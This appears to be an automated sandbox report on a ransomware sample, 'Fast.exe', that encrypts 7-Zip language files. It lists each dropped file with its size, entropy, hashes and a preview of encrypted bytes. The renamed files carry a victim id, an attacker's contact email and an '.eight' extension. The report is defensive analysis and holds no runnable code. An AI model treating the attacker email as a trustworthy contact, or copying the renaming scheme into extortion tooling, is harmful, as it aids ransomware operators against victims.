    Preview:.....C.....\.T.s..}+.[.^...S.^...l...i.F...A....xVy..o.Y.Tul...CP..]n)`.\...f..,O&xE..[f.....XQ..C..8..w..#...g.m..k.<......Sx.......s...!.".i.......j.*>h.*...rQ.vkPIN.....3.....n[.N..[.i...x..].U...C.s..bd........{..t.c$..-C..x.@..vhv...o..Y;.]..c.uRu...'....'RRFQ.....Sli.....w.. ./.v.(.....V|K.La.......o.T......9c.@wT......r....B..."......T..7Q......e."F.^u\..zI..+..&..2.9.....h-."...I....D....[*.".s..:.....V=M.9O.m.2.T.x...G.*z...u...\.#.....D..........w.1...V2...!0......X#. .9].9l..L..:.....F..[.B.h.l..0.....^...Y..]T..r..k.A;.W.....r.... ........i0....33...!98!..<".?H`..L..}.A.?......K\G...$....]B.pf..............~..E. &.M...).....T.....%..5.~.*.]..U.'3.....,2g...e..f."....i....N2...X...3.@.:.z..n3......<...).ZA)..H....3.....2.q].J.+hT...(.Yd.{k...t.38.0..>.y.W..V.T./.m.S....{.>.3.Y<..d@2r~...:P..2l.^.hQ.A...p.....-gc.C.....\...oP.`.....du.....g.?MO.;......I9-...W......j.g.5*9......U.*.......X..D..`.......K...c..Q;|...p...

    C:\Program Files\7-Zip\Lang\af.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):5266
    Entropy (8bit):7.955959727548579
    Encrypted:false
    SSDEEP:96:07c+bPE1z3iTuttRLs9SLdoKuS/mWWYP0CQalszInBfdqg1QY61uyGjT/56dheBu:Ic+b8tRTLOgmWWY88vd9V61uUuJA
    MD5:6E5B49F26B6A3B3A5CC871403528BD4F
    SHA1:86FA5FCBFA0C14E601B6ADA385AAFDB5E3DB57E5
    SHA-256:3CC785E137ECEC9167BBA204E4AD36794E428DADAC0D144D530671AECFD29BEF
    SHA-512:A28EB8DD2F49EC76459FC5B00EEBB090C0737C50B46AB32F9DE42D634DECF6F1027A7677DB4936391DFBD4A01FC74138E307D9CAB57B29F803B8DDF942A1631A
    Malicious:false
    Preview:.n..wT wM.....)...G...&'y.....-L)....8...3....p....8|....g.]...>.....<.4;d.FG.K..6......0s.!;J.+...._Ri..2....^..........%.r`U...x!4..W...T.M.E...._N.8.~3..8...'V...S...x.3........j...Jl....a.7c..C...G.E.....I.....on....!.}7..*~...FK..../.....{..H...S........i..`...H.F2....m.....7.b.9O...<......]>@.n....{M................BF.....Q.. ..\xH..P..K........d..b2../.&&SU{.9......&.%..^Q.....3.....>..?./..J.x.V...4 ....L..S.=....8.0Z6.HB.a.A.......e...w+p`...*.}......7....Zw{.....8..G.r....X...c...o.jn[.>.e..}U......_V^.l..|.A..T.....r~.9......;...i.<.......N.~.q7Y.Q.+y..SD1pd..).x..fA....r-..7..:..X..)T..L)..|...U.s..T.w.|. .....3.{.....l..........O..@2...sA.lqaR4..W.j..+..T1/.&F....R/.m?......o../`..4T|.e.mA.s$.%.*.".-..kF..A.FY.3.-."..:$.@beBTJ.^j..'L.>..nh...c.r]6.7f[b..(W.5.L..w.....I.I.]..j.H...Q.(..`o..b.(.9....~.G.g...........X(.-.w`3W...........hgB..dk#...j....s+s}...X. ..xq...E{.?.v...BC.i..~.B..#....cw..O#....*.b...|...}.\O.xp

    C:\Program Files\7-Zip\Lang\an.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8018
    Entropy (8bit):7.975488267947544
    Encrypted:false
    SSDEEP:192:fZ/odUvhRMtQb4PiayZHsTdozZBRSSHcvn7N9oprbowWqGlj2y/A:fZosMo4PiaSHz4jv/opH5Oj2y/A
    MD5:9211F64D3441A0B30CB604921B44FD5C
    SHA1:34CDFC697EA06F51877256E28BF885B88F372344
    SHA-256:26B47B78055F0209B000CB2D1A799C33B0E63E2CF61982D3FB64AB90DAA3E529
    SHA-512:EA56E8863F04707433C275C0D73502A4304E461DFEF076150511E5E8F97BDCCFB04B3D5F770E435A7A1826DF7BCD3B76B1E53259EF1E85C96B4DB66F1259B027
    Malicious:false
    Preview:..4.m...=C......f.5^..`U...{...l..K..`rV. 8...;..R..N..7..HGU..].mz..c..>..=..E6.....*...J.j...q,....QO.w...3........po....:[..Cg..K....V..k} ...Q....C...j~..<...H...@..?.....c...1!.,H...(..;.y..,.F.;......n...|.\w.&4...g..^.[v......Q...v.e..6...?.......".w....Y,.N..F...5..+<]..1A#p.....C..~.....`...+.^q"....)........*ro...a.....4...Vg...k......<1.6.2.....?.]....6#..Y...e..E6..{_..1..!..>AX.f~..vY..;.# ....{.+O......]#....G....#...gV..`.=..Y...x.G...8...0VZk.M..#...._L............]j....z@+.H....0.\.=......[u.(...|.I^..:.J\\m....5Y5C...B.r.].b@..I.(>*..Z..;..,.&_........,.(...$...N..-&.....^..g...>Orei......B.W.^..W..)L.u.?#m.b..n"....9t\...].{.4...)j.A.e.. p..5..cc/.2...JV....DR\p....v......"%5.CN..v..]iD..7...Y.;.U.d.0..`..qN.>&5.'P...f......U..`9.~..87q.........8V.,.D...|..s..F..R....../...cI.p...E.P..0...#..%sS.m...'NH.r....2R.6..}..../@...[C;Oj....%S7._.D.`.lI]...[.A$a3?......6...j.LR[......2N...[QvCa..uYP..._y.&.KDr..Y......rU..

    C:\Program Files\7-Zip\Lang\ar.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):13026
    Entropy (8bit):7.986342071445548
    Encrypted:false
    SSDEEP:384:MON9jMuJfKpPO4W40IdvDLX09F06NNtPrW870A:Z7jNJfKpTP08YNtDoA
    MD5:AD2FDC0BA5E90A11322047F9F383B123
    SHA1:6423E4A4FBFDA8164623FA69D3937536BEA8EDA6
    SHA-256:26E49C430C9A32A1C80D84F0C1F41AF69E2FB978AEE1424B6C4275BD7F039759
    SHA-512:25EC6059879707FDC9737724599327C285482D5EBE352EB678316CC0B722C4451844F0EE492B2BC05398D651AD814BB355177DE09EB4C885E8D121C1009E0C8E
    Malicious:false
    Preview:.MJ.D.....O..F.....W..m..|.A3.....`.......i=..#k[..G...7U..P.V.ia....O...........S..5.(..%.. t.6....iy.(..{...0...s....V<!R.......?.3.'A..f0..`..6.1.T(P.&.-.+8...Id+."2.4...T.Kp.....F].(.....|q...Ni^.*.x..nM....G.....?.[...G.."..Nt......X{.3..L.w..0..(..a..K........9.p...%]..%G..I.H...z.....#..........^.j..s....D*..HO.b..ly.tz.JI.+.+9.k8.H.. .%#...&.......7^)....p......sgz...ux.x.k...:..|.|^ru.D:Ou......Q..C..w.&A.G.).5v/..X.J.s..',...Au.3...b....[........i..7...;....V.H\/$.;.sv...r-.B8...3...T.$.)v..\.....:...p.A~........c..}PdW.k. ..,}.^g]'.tY........&.G.S.j._....G..A...Rd%.>)..$.M2.[%::}S..';.5.q.T..)eQP.\P..P..i.A......xy.4O..k14K....Wx3....s..=..V.]c.V.<8.C.N...L.6.sY.mA........ ].V..H6..~..-.."..[.;..u...+$...>,5(.4.B~...E.d..2.Z3.y..A[...s.!......*.......(..P.I.U.h.J.s.....~..l4.f..!...9...*...Z.#.....}....o..4.l6z|u..tL......:... ..k..P=......87p.....I>Y.......7..B6X.....!iO...:.'.K..Ho?...z..E.S.}..2R..b.....'\]..g.....~..#.

    C:\Program Files\7-Zip\Lang\ast.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):5602
    Entropy (8bit):7.969808074449861
    Encrypted:false
    SSDEEP:96:HfcsJdUXvT63YqtWzpPNGd+hn8xlZVb5NdqeyD+c2ShouNuNLpkJ+6P+dVVNTWsJ:/cJr633kNkVb5Ndqes+80N6J+u+djNao
    MD5:7FC4959333300DF6A77D43876D0E37A3
    SHA1:2649A026084BADABB0CAE3D743FDCB812B16397D
    SHA-256:FA7736F7309466B78EFCE0B3D9FDAEE1A36285BEB6745864CD97D66209C8FDB0
    SHA-512:D4ADDCA918273B5046661BE9D59043D010624BA599FE37DD38D8EB080E0951851CDBE7A5211E6EE6C69254C07CBEA90988646791FE17ACE2A82A1DA90F2BF30A
    Malicious:false
    Preview:AW..-.7....-d..eg.v..m..a...D.|.....+.;.0k..:.\5}-.......3i%* r.).>/7..k.'.+|=.....;*}.. .[..q....}.g..z]..Y.GC-.z.hW+.Z..6..FZ"g~9.Y.9.....Q..F.M.l~L&A.n...[.....$.d.K.....?.t.z+a._0....2'...[Q.e......Okw@..\QP\...[DD.!...o.6....+...~....8$o.o&...0.....j{.?..D...Ys...4.....$...{.q6o....E...)-Q..e..u..\R5.W...M.S.Q..3....L..Z.....g...;..(w....hS. k*.....;.\f.Kw....;v...y.8.l$N..6x.Bv..zf.-.........k.c.........n./rym5]7.Z...K...\...T4.tDi.;~....N..cb...C..<C...{),...9..,.H`.g...9....}......s...g_..iqY....N.9.A!iP..e.@A..r>f...q^..... 3.....9.{.U.S.e..*..nj....,2.cE.k..M......2it.....<./}:8.( ..j....PRA=..6....p"w"...1..#..vH..?*...`..()h..44.].5.^#.h...^ ... ...Y.:....EO.mm.GK...F.iG;......J.N...Z?.o....3..7...H..iC....P.....A-..A.4.m..iP.[.Ab....f.6...}%...E^dx...X....Q{...6..V...fd.A.^&.........^...W.&..C.8.O}& .......].=l.-.E'....P..v~)./..r..........a....>.1.^.9.$.=...K..[..`b... .u.t..S.7..R".6eF..j....nV.B.L..6...f..{.$Z..q

    C:\Program Files\7-Zip\Lang\az.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9858
    Entropy (8bit):7.981168958785209
    Encrypted:false
    SSDEEP:192:pflbvH34U3OyxQTlwu59AOt0nEnDT3ccphHLYaIqGMZuh8gVVV8JtzCA:pNbvXK5wu5tCEnDbccphHLYaIqGMZuqh
    MD5:0D4E4CD4EEADDDF885B1F80AC872F4D3
    SHA1:352AA8544BAA2E90B1B15FD4B52E681BA98D58BB
    SHA-256:741990887DA9CAB2E790788C6542BC4C2DBD776EBDD317CE4565E62C48CB5902
    SHA-512:6A0ADA725A2D0B3024281186505FDC47A3C1490AD15F115DE31B7B73227F7EFE9E1749199F500CB0383A1BCD40235C85B33C2CACD736B145F675365262EBDC71
    Malicious:false
    Preview:..`%.c~G?...lY0..N..*.+.n.Z..&...z7:.d......1.-4..X..../...os.........{.E&*9...S*.@..."....H..j6.($.A..!......n.;...M.-.GOS.!......J.....?.~`..|.Q..{A+3...-kSi[..........f.{*))z\.O..9.........K^W..N<m........T..zl...1..@.....T.j.'...Y._....x...Jq..T.C.S9..I...}...*..c.]..QV.....(a.4%|..6.T....Hg..J......JF.P..eo^.FzW_}.r..$T.C.....+.y........?2..l..z#...(P.T.G...Q.U|>..4..%......m.......v...0$.Gp...!$.,p.z,...kOw.......I.}D...-1...p.oJt...=...Y..Ct-..d..Fxs....D. ~.7..h.4.;.p.c.fQ._.5n....?.+.....$......S..q......SZ....w..vy.i.GW....&^hc.. .=...7.H........F..t..6.2.;....U..,.cq..t.>g...j=]..'A..8.pc.x.r........u..I..#....*......D;.#.....m|..v..O../4.....D...B...i.....!:.L4t.nC.....(..J... .....#E?....Q......;.4p..B:..n..$.nN<..m...P.......P8..35...i>..a.=...../%.6........+#....%A0S.$^o7(.\g,..((..z..]D...m...y.....Z..#..o..(....~.. 8...]....g.y..MG.......\N3.c\....D.._.Y.../.3g....43.. ..x..Z.3...o.@..XO...^<...T.+.......P.K.

    C:\Program Files\7-Zip\Lang\ba.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11474
    Entropy (8bit):7.978675475463158
    Encrypted:false
    SSDEEP:192:gcD9CK+xOIwOIcPgOR7xwiS9lswmxxy4kyQ8xWXHL1PAjjKPfsd0BhA:KBxOIB3PguxwvihxxyNB8xYr/a0hA
    MD5:DACB58E310D06759540672E81E24DCC7
    SHA1:C1E8907FE9C69347528FDCA7835139CBC0798DA7
    SHA-256:212525D8E3B4CA5F4C7843CA8FA079323B0129606DD53261CFADA8B479AB6723
    SHA-512:33EED380D92D5591CFE0A37C105BA8468A5825D0B48422AFE05E0E7EEC971797DCC80487824345C8E7BF2095E6C55C95B5BE235ED528864D4F71C1737CC59DFE
    Malicious:false
    Preview:...\..v+.........E...R..me.uO..q2:;1...Y29|-.'.e7.D.2f.....F.|.D.B@i......EGo..3.ap...)3..xaC.3..Z.zL..#?....3.".5.EI..V;..o...Ahn...8Q.[.._Y.!..7.M[..Yn."....2..3...?D\+....2M.u.xp.s..I..].. ...r..a.i.Z..$V.\...FAHw....?..G...p...K...../.*].8..;..^y(V.P.c..o..4.=.&(3.n1aH).......@.Y.:r.X......D.,...A.hZ.DY..%ik5A4..8.c.e.%p...=....s...I>|G........4...jw......\..t...I.$...n....zB...G......j...O.\.Z.Y...j.r...@.#.[..........+..:\`..r.A...j...p...."G..gn..gYO.*...t..p.!.......b^J.C..r..wd.0`...S......;&?..qd.....9IO..D.?..zb._...&.2..I...;....../M.y)=..=......GF.C`Z.....U..XP.V{B.......z.V{e..U.Bz.b..@:...v6...3>.n-K|...........k.u.;f.r..u.Q?.jW..6.g..=..ty....:{...0`.>.#\.G....}.=|.Y.Y.<~.'5U..saa.h.&..T}.5D.=....|.E...Q.7:.N3...2....,.O+_O........np.>.......s.I,..T..*6x..b^.y .......J..-z.:O4o.a...._l......(..y...{8,;.ym..97..IPP.Gi...~...I^..]41 ..;.`....mMV..c@..vM..T... ..|.....f.!Ld}M@....Y.Kd..H...F7....q>..k....U..o...A.A..1y.

    C:\Program Files\7-Zip\Lang\be.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:COM executable for DOS
    Category:dropped
    Size (bytes):12098
    Entropy (8bit):7.982855038904786
    Encrypted:false
    SSDEEP:192:CKMr6PT/Br7KE3Dfl6mZM3fFYEzjK5AXhbj9+TqrJWJMUDnoKDo0wA:CKC6PTxFTN6FYWjn9rJWDnnwA
    MD5:278AF8CBD886E74D8123D3821CEB7ECA
    SHA1:E5DC58FC8F07AA32D3D72EA99247A2B54A88AB67
    SHA-256:88A2AB6B9BFF31DEC90E70CFCC1A0C9C2A1EEB374D24E5930306E128C0F5C1D7
    SHA-512:D1DEDC388B385E0BDA3CE5C5FB25BDC5D0EA119D0D4AA93405CBCF3D5D38000016BD7F543992E9489E0F951D4B0ACC00475BA3A1E8FDCE2C227BE0A9C9F58E24
    Malicious:false
    Preview:.#E..a`.}Ec.#Xl.Ah.x.......S.T.....v....+.yMb.?..yYgR...W..M...U3.n._6.l`.....p\....fVl.+.b.........qL&.2Y.;......=JH.f.3...B.4m..&.#o.".F..l....N.a.K.6...i..;....+8E.-.J.j......t.}.6.."0..U..of\.|#$....:..:b.{.Qv>[......t..`.. .R...C}.!.1.zD.?.b.......bh..oa9Q....U.v..)...}<N.M..2.3.(.|.o...Ln#=LI.r\....e.e.KNG....y..E...'...L..}T...>.....,....P...g.-.~..0.3.....G...q.u.............d-|5.@...#..g .Z........Fl.".C........Yf!^..9d^..U!v..,.N.;JA.....f...%.u-.?..XI.gCA....`.w...Q..X2.j.k\@2|.E0x...].....a)....o."...3R..\.e........8(... ...7.U|. ..x.n.I.((.[..'..0hVW.Q..K......v......)h......f..z$...J.i.Y..hc9....+.e..l....6-........`...oe....fpy.6.+........u.f...E~.8d....kZ}..|W.l._...F...V.'..R.....[...B.P.l*..2.A@f..U).U.e..=|?._.v..~.&Ds.`.b8....\1..../BsS'.......m.b.....Y.....>.X..F.S........ro.R..{.]p.Y....:1.|.gkG.........sC..%3...Z..~...`#.V;......(p.F,].+.H.....Z(D8....i....q....EGM...2.....Bx.V.S.eb.A...........BVt.I.5O5.....B

    C:\Program Files\7-Zip\Lang\bg.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):13330
    Entropy (8bit):7.985935356552536
    Encrypted:false
    SSDEEP:384:ze9SrwJ2xjwRjX99Iocdtkz6qa5WWsLhm9T6A:zySsYa9bcd06qjLYT6A
    MD5:E7A4A42CA03A71433986610DB2D2E994
    SHA1:06AA574AB15C1E645BECCC9A772C04C8C5BB4EC9
    SHA-256:6CB0E4053060EDF71F6DC19A4D68B1FC3570B8A3985A753CD9174F51C51D8445
    SHA-512:39F21A7D955AA11CCF9D1F3B9036D5A16F950DA06ABF2670727377BE5F99FB5C0833A349F77546BB3BB3A05F5A3E0BE99BEA3AAD5FF0459F3D3FC8AB3AB6E6F5
    Malicious:false
    Preview:...."<...........#k.t.a.a/.....u%...0...u...PW..6..?[....Z.;.*1..B[@..T.?;.s.Ek...........k.N.bT.c.|..K..Y....p.X.1ok.{2h....Q...Uj.....w!q..a....O..z.Q....wG#.G x...."^...V.u..^...a<6.G..0....Rx*..F.h$.4..)2.t).&^....7..fS ..b.......K..1...4`.uQ!h7>..%.iA.....f.9fDw}}.(@*.0.|...a5M..OL.......(.N.[o..l...J.c.yU.....f..w..+....Zi..O..0.`.h$..4...}.F..)...H..A.k.oz.r/........'X{].8{.......3iVH.(.....w..w.7.e....#....a........I|1.f}.Q`...h@....k.~.}..f?'...rHhl|.Q?......~.eB..J.!.G....2.wR.AT......Q..f...2.p.....%u'V.$....I,R.. z.o....Z.^.. .{ .r.h......A9.7.|........r=<+`......YR..g@.].d>e'.LYt&...3..#...d.&.....[... ..`......E..}..;.......3.T..k.}7C[.......>...._.[Q..H.k... C....F.(`/..[1..j.Y.<...Ji....f.....L....xD..>..JA<L/.qV..8.).g$.kf}.k.5..<.]Ty........~.....<..U9F..>4..8F.f<..%/@..S...tgRx..........U...`^....$..O._q......z.[...dQ....AZ ...nS.$....T~y..g|.F.....E.A..4.!..A-..xD......9$..5]..p.+..c...%..u.......&.{;.'e..H/....r;.W....R/.H0.|

    C:\Program Files\7-Zip\Lang\bn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15266
    Entropy (8bit):7.989001453756689
    Encrypted:false
    SSDEEP:384:rRvRhKoQLf3QEOYqjS6qKQ44d1KWbLsEolXZwA:rrhKPfAE5qjSumL6pwA
    MD5:CE3E4151561A484982C65F908C52DDDD
    SHA1:39AF761F4494C06C8F4EB0E919E2F4FC979F465E
    SHA-256:A9C27660A3000FBE9489E2B97DD2B7E50E9411EE279307163C54B41C9C129C1D
    SHA-512:A4125E3AC4808D308249B98B1547BAC28FF71E72A227FB784B702C3CE6E592D0614EADC7BA63FC36075644EDD8E900FC6DB5FAE74C4A348809445378A3B953E9
    Malicious:false
    Preview:..o.........?.pMA.0.:#.Y..yi...H<.s....~..q...%V.....s..`T.....u.J...oa.F...ow.VN..*...E..fR..T...Z...x{..... 1....uq.(..E.(....[.~u......I....s....=+i>...o[.h..Kn[..b.ke.%s...2..l.......DT.9..A...:...J....R{E..#C...{..[..}R...[."..v.......3..>...8O...;.-.Od..M.......9X2J.....T.d3a&;.m.L% V.f....'.$../....BX...\xN.=h$.a...&...\.o..!.8.<.c..-_[W....{.h..V..#..#t'.r..g=.R.#......Ni.....t.......BO!..8.....5....7.3~.K.h<..q......\...L. ..p...{.p...o<.~;.....Nx.....w...)...5.nvT...D)..:m..^......T....R.".C..v...m..(..x..2..x. ..~..;.ON41....L......l.QL.}.d.$q.A.%....`.T:_.....5b..........%..d......._...X*..2.QD.7.Dt@...`P.M@?....'$.c.....9...[.....\^........f1.Q.^E5.G@....O..Ao.|..X.s.(.^p....}i.|DU>......g..'...c7..p6.o....{?.J.$._.F....R.4...Z../.5$H|.W...h.Qi._.n.F}.=4...)...i....\H.'p.`....}}..h-.e.."uFo...%..>..@^0...R..4.8W...wD9.H.._...tb?.#.b..[....?.......%4...._....E9?F.......*..:M~...)\...^...,R......d35'..Aw.Um.n.?....*-4....e

    C:\Program Files\7-Zip\Lang\br.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):5586
    Entropy (8bit):7.960522819442022
    Encrypted:false
    SSDEEP:96:JcJ3hGCDDaLHYNnpOadFKcQ1YwP8PYitFd4Pk1xA:J63hGoDE4iDcqVPniGyxA
    MD5:8625EB82A1FF76C7A7B03C117B379039
    SHA1:1604787B3E1CD0C3F03191718E1132007B8A2F90
    SHA-256:863159D1F1659F9FC1DCB15FB38C8DC035A740C106641C17E842A519539BF938
    SHA-512:44EA4C8EDD9A7860444022EBC980C867DB61AD171A97F1134C1AFDE29DB69B891FDB627D17CC35C931CEA62B16D0C078DBA78E285C0A46302C616C1623A70135
    Malicious:false
    Preview:z...m.a2.>....t.....V....>.....w...".l.q......../->...R.w0......~..8l=.3oT..m..^_`aMM.....N94O....W.6.!...FN8...%.%.O.<.L...>'kK,{).H..9i@....S[...Q.{.jD1.O.'>.36.k...g.1.....z.u.,a]..G.......Ba.......p.ez.C...8rw.O.b..J'.J...0.6..>..XU.0....1h....?v.qG.dH)...:............`.....S....a9.Z......m.4.......P....L.D..8k......\.=......C..\e....m4...C!..E.Dz..:..B..N..7..F........(.>.<...d.%..P.W.;#%1...N..:K.id#1........OkH......:.....+.Yi.....b....|....I.......<..Ab.4.1l..........fa..?.7|..|W...hS.l.......N*.r...d.dj..W..C|...s...dH.o...R{..;...KA.d7E.H.......{.Q....sN.....<.W..y...Q.?..q]h0...J.Tk...G.r.D.....`......5..........m..I.nf.u....i0... ...#....%'.&P.@|...,#9mN.?...g.2../.8..J.[..>...(}Z1..:..;.....{................H..V.}C...z.VD.#...)1.v..gG]..n.S.$;&..U2....0:\..Ju.%.K...+d.%DV1>...A.}..R......N...M.......-..t..)^.?.?+w.=... L.....o....d.ON.$......g$.[..J....#........iym....k.......]......;.Hp.YU*.q4..#......Rw....2.....Tb.Gu..

    C:\Program Files\7-Zip\Lang\ca.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9538
    Entropy (8bit):7.980935283650416
    Encrypted:false
    SSDEEP:192:NoWQ82EUUAZ83abo+TKUtkQKJKoE5FRjg0j7+XG+n7VrfzJ/MDssQrnA:Na7B7Jo+TL7gDEn1gAStVrfBMjQrnA
    MD5:F005B13BEB8303C9E2C0BB3EB52B3C10
    SHA1:D62B7E4F80055CD0C2AFB00E2F43BBCB04726307
    SHA-256:DC740B467A5E65AB1681ED4AB4D5AF604F07048176ACDDE8B914421D935E7794
    SHA-512:5E24EC71DE24AB98B73597F2C3CF17BB33E229C5B910BBDCEFA391178E35EA61C278E2A0AF9D65AADF39925CCA30A3435F3EEFA83CA82D601F0C48AC53FEA9FE
    Malicious:false
    Preview:...2.".z.z~.....G.8.."..........H.5R;...........1.h..u'.."..%..'..]..v.......Y....TZ..b..i7.......2.!.....+.@.4+.S.!E..XZ#..&.2[Ww*..g..l.|1.3..8.`....$.n./.?.%...`.....rj..`Ul.ogQ....q.O.^KQM.a...hs2&..E..O.W...[...H.5d.3...%1..P........V....@_...vu.kZ..,..W.vu.R.ZE......A{8......M..C.sy.y.?..$M\..}w..(..5.9q._J......L..!..^.r..X....s..&....&:...K..R.m.v..]....60y.vq".-..n....w.i......\s..1q.^..L>.Q[i$.e..!.......%I..._}...L..?1..&..U/K6..e.&h....#P.Hf.....'........3<6?..}.....4L.<d..m....S...r(...m.?1g...[NQ...S...4..|l}B.^P.....:i.F................so..v.x.]H..I...k...pxm....w..W..X...&m..n.....?....S8.......<.%....>:..dV......}.#.W...c..T....;..Mi.....%_|...iU...{2....m....... (NG0.....N}.6.....{..>.{.7=.R.z.c...w@pa`.....+.G......<....)/q$.Re.P..v.F..zd]'..ML..DA{SZG.k...-|.0k...x.+46..}c.......4..[.o...<).....B..w7a._...O....=l...).,-..Sz.(.=tN..{|nM...d.....=...6C.c...F86p#.2..{....{V.L.;.._.Q......v.$.........8../.r.x.Rf&..

    C:\Program Files\7-Zip\Lang\co.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11186
    Entropy (8bit):7.9815151681910095
    Encrypted:false
    SSDEEP:192:B9xgqRh3kqeu6hXNGLePHB1CKt6TobsgZEktlVdApjXg0EKlv0F0qQcA:DJL56bsgZEkss4v0CfcA
    MD5:BD5FF96905CB981D6C796014F2A6BF3B
    SHA1:D01D739F936C72383E52CD73DE8087C23F97F4E1
    SHA-256:ED7E1AB613439DACD3FE7B47043E35C5B66E0CC5AFB7D3733A48675E1A3E924A
    SHA-512:34EE0D1BCC9D3534F6DFAFA178C555E9E604DEF1F9DAABF2EB9B1F5D4A66746B10695D0063F941A36A63278E026DD23A247B7FA2DB77F486AE5AD10F0C01CFB0
    Malicious:false
    Preview:.;..jhj.&).....h..+.....?[..^J`......P..w;].g.;.<.-.....G..D...(..L.+.......:..I.;.d.....2...l'. .....U..+..;r.y|A....-xJL|..`T_.Y_........*...d....1S0..[..+IB"......4......zC.BT<.s}.:..~.......W..@.......={..."MyEU%.....|+x^.M..x...6.>.......&>/~J...K..n..oAI.`$.[x|.t.a[,..h/n_..m.x7..]...v.Y'..`..f....PnC_.h..dnW........Q.k....%.Q..k.0..|..p..7d.^.|D>....'.d}F.D@..}Hv...p.. ..NfB...^R>..\V&.....>...aS.......>{N.......4...$..+.p....if8.o.GU..60'.6.#s.^...........E....e.hN...]...f...x...B{b....\.Pr./...H{k-mE.%.gcnL.........}....e...Oc.....*Z...x...).t......2.2bOI..2.Xd..N..!@`...=.t....j._....|4A......C....Wy.Q..(.2FL.i..2...,...i"c...z........!....w.....n9.....>....o5Z..Y]....-....bP.\[.L...+^_J..9....ac.uI.,..E.......{..(i..zG......#.}i.....B!....E.f....?...+...z..6......./.`cx..j.Ug..oz.h...U..V...N......}.\.}.S.'.P.....$>....h1...#..X....xLq...)1_4...L..0j...@,.c.........E-..&.,.9.x.u....7...u.2..-2..NI....:.2..5......+#..Q.d$.i.......-.....G.

    C:\Program Files\7-Zip\Lang\cs.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9378
    Entropy (8bit):7.978240850911514
    Encrypted:false
    SSDEEP:192:WAvK/OWu4TLLrbUPKVbEeZH8DUr7KTlBoVVEoVI5TRGlGxNRvreP/lA:TShJLHoP2fxFr7KOVEom6l2vqP/lA
    MD5:49DC6F6A77E8680E8129EAA108C6CEC7
    SHA1:E693CCE2484C47C1A38A0A5E4F0C53129154544B
    SHA-256:A3DEE7F808C1807978612FE3BFBC9C6F3D40B36DF0309EB853A3EDE52E2173C1
    SHA-512:8042568F7E3771F27EE8296A6A246D79FA655075B980D607F499D6B9A6AD263D4302F4FFDD88590858C2D7A42598E8A46DF4B745585B36694FF4F531ED682C41
    Malicious:false
    Preview:.Z@..-U..).W...h..).p4....e.m.8.,.L5..[,.F4.........S.....e...@i..t..s..U...j....?...^7.........q./...0......ZC.....j..'.a...5..........?...2^..u.......6.Q.i....4,.xs;c.....!..T?d.j_.:...t.........#....|_.7...F...q.........L..@........4g..;........y.....)..H.:.....L8.T....0.....IF.c......5@iZ$y.(...~kU.4.0v...x....dK..,..cxX.8..R....1.y...s.R.....jf1...@e...Y..L...8...5.....[.a...S.x.C....|^../#.8..;.;9,.M}..+.CqL..M..<2.$......{`..}.j.?.G..a..`[.c_.C...%....+.........U..v.t;.L.`..A....zk.U.wj1.i....,?)u.`...,l\..L..@..N......K.L....n....JP.$a.R....;.E=.*..Y...{.'...s........~.N..f...zg...cF.#...P..!..h..I..\.`|....L,bX.s..!(g..m$....c..j_....S......... Ax.Pvu.C....3..x...+..../0....^d.....1_.....$....@..\......[.tB...>.BX.S+....C.T.....(..1..q...J...B.........D......ZA...8...Y.j.5LP....dh.....Dl..aBfH&.%.D.%....^&D...m......'IM...h......^....D.$U..N..E...P.z...]...O....y.6H.....2......AJO...WO..k...%.G.a .I...5l.s.,.).....Q./.

    C:\Program Files\7-Zip\Lang\cy.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:OpenPGP Public Key
    Category:dropped
    Size (bytes):5458
    Entropy (8bit):7.964213594076986
    Encrypted:false
    SSDEEP:96:pM99CODb0PbI7HKh1tY4YwtXXFGwFcVh4X5LrKuMzs96YYOY+768eOZgiHA:pyFH0PbI7H+1t+E4wFsh4X5Leu0UHWMA
    MD5:9D8661CF10E0F3420E3F02A2E306AB20
    SHA1:C6A745A98C46A20A06D8D8CE48CAA9E8E8A79EF1
    SHA-256:C21DAEBC19CE3763106379F02C2E11637544A5CB2C2DD1FE403B857AE48E3697
    SHA-512:4A07096F7B7DB2669C2C0D43F08C47357700122903D3A064FA37922A1015DC364851C691CD02FABE2C4B9ED40BD0FC7B04022230657B1677A6FF7C38C5EBC1C6
    Malicious:false
